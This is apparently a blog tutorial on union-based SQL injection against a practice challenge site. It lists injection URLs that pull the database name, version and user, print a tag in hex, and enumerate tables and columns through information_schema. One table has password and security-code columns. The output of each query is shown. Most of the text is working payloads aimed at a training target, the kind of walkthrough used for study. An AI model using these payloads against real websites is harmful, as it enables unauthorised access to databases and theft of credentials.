Today we will learn How To print Database , name , Version And many More Functions and variables..::
Lets Go ::~~
As we Soved this Site in Previous tutorial ..
So we know that it has 3 columns and column number is vulnerable ..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+
------------------------------------------------------------------------------------------------------------------------
Now if We want know database name then we type database() at place of 2..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,database(),3--+
Username is : leettime_761wHole (it is databasename)
-------------------------------------------------------------------------------------------------------
Now if want To know Version of this site the we type Version()
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,version(),3--+Result ::
5.5.42-cll
------------------------------------------------------------------------------------------------------
Now If we want to know it is user name then we type user() at place of 2..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,user(),3--+Result::leettime_W89sst1@localhost
-------------------------------------------------------------------------------------------------------------------
Now Going To Print Our Name ..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,~~inject by Afghani~~,3--+
It gives Error :----
Error While Selection process : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'by Afghani~~,3-- '' at line 1
--------------------------------------------------------------------------------------------
Now if i Convert Into string and also into Hexa It Print My Name ...
In String::~~ By Putting single code 'Our name here Goes'
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,'~~inject by Afghani~~',3--+
By Converting Into Hexa..Convert inot Hexa and then Mulitple with 0 ..Like that..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,0x7e7e696e6a6563742062792041666768616e697e7e,3--+Result::~~
~~inject by Afghani~~
--------------------------------------------------------------------------------
How can we Print multiple varisbles and function as at once
----------------------------------------------------------------------------
By Using Concat , Group_concat , Make_set , export_set
Concat_ws We can Print multliple Values at once..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,Concat('~~inject by Afghani~~',database(),user(),version()),3--+
Result:::
~~inject by Afghani~~leettime_761wHoleleettime_W89sst1@localhost5.5.42-cll
So we want print it seprate seprate . So we use <br> means break the line ...
<br> into hexa = 0x3c62723e
So our query look like ::
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,Concat(0x3c62723e,'~~inject by Afghani~~',0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,version()),3--+
Result::
~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll
Now i am going to Show tables and columns..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,Concat(0x3c62723e,'~~inject by Afghani~~',0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,table_name,0x3a3a3a,column_name),3 from information_schema.columns where table_schema=database()--+
Result ::
Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll testtable1:::testid Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll testtable1:::column1 Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll testtable1:::column2 Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll testtable1:::column3 Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll userlogs:::id Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll userlogs:::username Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll userlogs:::action Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll userlogs:::date Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll users:::id Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll users:::username Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll users:::password Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll users:::user_type Username is : ~~inject by Afghani~~ leettime_761wHole leettime_W89sst1@localhost 5.5.42-cll users:::sec_code
I hope u Got it something ::
Author (Afghani):::~~~
No comments:
Post a Comment